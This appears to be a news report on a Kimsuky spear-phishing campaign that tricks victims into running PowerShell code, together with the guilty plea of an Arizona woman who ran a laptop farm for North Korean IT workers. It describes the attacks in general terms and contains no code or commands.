North Korean hackers, specifically the Kimsuky group, are employing a new tactic in their cyber attacks. This involves tricking victims into executing malicious code via a PowerShell exploit. The attack begins with spear-phishing emails, disguised as communications from South Korean government officials. These emails contain a PDF attachment.
“To execute this tactic, the threat actor masquerades as a South Korean government official and over time builds rapport with a target before sending a spear-phishing email with an [sic] PDF attachment,” the Microsoft Threat Intelligence team explained on X.
The PDF directs victims to a URL with instructions for “registering” their Windows system. This involves launching PowerShell as an administrator, pasting provided code, and executing it – unknowingly installing malware.
This method, along with the “ClickFix” technique, is gaining popularity due to its ability to bypass security measures by having the target self-infect their machine. This is a clever use of a Powershell exploit.
This cyber attack highlights the evolving methods used by North Korean hackers.
Separately, a related development involves a 48-year-old Arizona woman pleading guilty to facilitating a scheme benefiting North Korean IT workers. Christina Marie Chapman’s actions allowed North Korean threat actors to secure remote IT jobs in over 300 U.S. companies.
She posed as a U.S. citizen, generating over $17.1 million in illicit revenue between October 2020 and October 2023.
“Chapman, an American citizen, conspired with overseas IT workers from October 2020 to October 2023 to steal the identities of U.S. nationals and used those identities to apply for remote IT jobs and, transmitted false documents to the Department of Homeland Security,” the Department of Justice (DoJ) stated.
Chapman also operated a “laptop farm,” hosting multiple laptops to create the illusion that the North Korean workers were located within the U.S., while actually operating remotely from China and Russia. This allowed them access to the internal systems of numerous companies.
“As a result of the conduct of Chapman and her conspirators, more than 300 U.S. companies were impacted, more than 70 identities of U.S. person were compromised, on more than 100 occasions false information was conveyed to DHS, and more than 70 U.S. individuals had false tax liabilities created in their name,” the DoJ added.
The FBI has also warned of escalating data exfiltration and extortion attempts by these North Korean IT workers once discovered on company networks. They hold stolen data hostage, demanding ransoms, and in some cases, publicly releasing stolen code.
These actions represent a significant threat and a concerning escalation of the cyber attack landscape. The use of a Powershell exploit in this attack is particularly concerning.
